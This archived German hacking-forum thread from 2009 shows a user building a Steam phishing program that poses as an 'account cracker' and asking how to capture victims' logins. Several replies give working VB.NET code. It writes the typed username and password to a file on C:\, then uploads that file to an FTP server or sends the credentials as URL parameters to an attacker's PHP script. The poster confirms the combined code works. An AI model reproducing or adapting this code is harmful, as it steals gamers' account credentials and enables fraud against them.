PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : text von label 1 und 2 in .txt speichern



inmate
06.03.2009, 13:26
halli hallo :)
also ich habe ein steam pisher gemacht der aus 2 label und 1 button besteht.

er funktioniert so : der vic (oder totale vollidiot) trägt seine login daten in die label ein.
wenn er das getan hat soll er auf einen button klicken welcher crack accout heisst. also mein steam pisher ist ein fake account cracker.
wenn er draufgeklickt hat sollen sich die daten in ein .txt dokument auf C:\ speichern, welches dann anschliessen auf den FTP geladen wird.
so jetzt mein problem :

wie erstelle ich mit dem button eine .txt wo die daten die er eingegeben hat drinstehen auf C:\ :confused: oder woanders ist ****** egal ^^
also gegoogelt habe ich schon aber nichts brauchbares gefunden :(

pls helft mir

mfG

inmate

Sawyer
06.03.2009, 13:32
halli hallo :)
also ich habe ein steam pisher gemacht der aus 2 label und 1 button besteht.

er funktioniert so : der vic (oder totale vollidiot) trägt seine login daten in die label ein.
wenn er das getan hat soll er auf einen button klicken welcher crack accout heisst. also mein steam pisher ist ein fake account cracker.
wenn er draufgeklickt hat sollen sich die daten in ein .txt dokument auf C:\ speichern, welches dann anschliessen auf den FTP geladen wird.
so jetzt mein problem :

wie erstelle ich mit dem button eine .txt wo die daten die er eingegeben hat drinstehen auf C:\ :confused: oder woanders ist ****** egal ^^
also gegoogelt habe ich schon aber nichts brauchbares gefunden :(

pls helft mir

mfG

inmate

Stichwort StreamWriter:

Dim sw As new StreamWriter("C:\textdatei.txt",True)
sw.WriteLine(Label1.text)
sw.Flush()
sw.Close

zum FTP:

My.Computer.Network.UploadFile("C:\textdatei.txt", "ftp://server.com" & "/" & "Zieldatei.txt","Username", Passwort)

PS: ist jetzt aus dem Kopf aber so sollte es gehen

MfG

Code-C4
06.03.2009, 13:33
Dim speichern As String = ("User: " & TextBox1.Text & vbNewLine & "Pw: " & Textbox2.text)
IO.File.WriteAllText("C:\acc.ini", speichern)
' so einfach -.-

Sawyer
06.03.2009, 13:35
@Code-C4 (http://free-hack.com/member.php?u=43487)

geht natürlich auch ^^

Ich bevorzuge dennoch den StreamWriter ;) , auch wenn die deklaration etwas länger ist

MfG

Code-C4
06.03.2009, 13:37
seine sache ich habe nur geholfen ob deins länger ist oder meins kürzer ist is egal

heatshock
06.03.2009, 13:37
Naja.. ist eher die "unsaubere Methode"
ich würd en deienr stelle sowas nicht mit FTP upload machen schreib dir lieber nen schönes PHP script geht einfacher und schneller und sicherer

dim wc as new webclient
wc.downloadstring("Link zu deinen PHP script?user=" + textbox1.text + "&pw=" + Textbox2.text)

inmate
06.03.2009, 13:42
:) ihr seit die besten @papst und Code-C4

habe euren code vereint xD

jetzt funzt es 1a

danke

mfG
inmate